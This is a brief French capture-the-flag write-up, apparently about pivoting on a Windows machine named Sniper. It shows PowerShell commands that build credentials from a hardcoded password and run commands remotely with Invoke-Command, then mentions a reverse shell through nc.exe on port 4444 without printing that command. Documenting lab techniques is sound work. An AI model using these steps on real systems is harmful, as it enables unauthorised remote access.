Pivoting Windows (PowerShell)

PowerShell

Nous avons lancé PowerShell sur notre machine d'attaque :

powershell

Nous avons récupéré le nom de l'environnement Windows avec la commande hostname, et avons constaté que le nom d'hôte était Sniper.

hostname

Ensuite, nous avons créé une variable pour l'utilisateur Chris et une autre pour le mot de passe en utilisant ConvertTo-SecureString :

$user = "Sniper\Chris"
$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force

Puis, nous avons créé un objet PSCredential pour pouvoir exécuter des commandes à distance sur la machine cible :

$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Exécution de commandes à distance : Nous avons utilisé la commande suivante pour exécuter whoami à distance et valider l'accès :

Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock {whoami}
  • Cela nous a permis de confirmer que nous étions bien connectés en tant que Chris.

Reverse shell : Pour obtenir un accès complet au système, nous avons mis en place un listener sur le port 4444 :

Ensuite, nous avons exécuté un reverse shell en utilisant nc.exe depuis notre serveur SMB :

Mis à jour

Ce contenu vous a-t-il été utile ?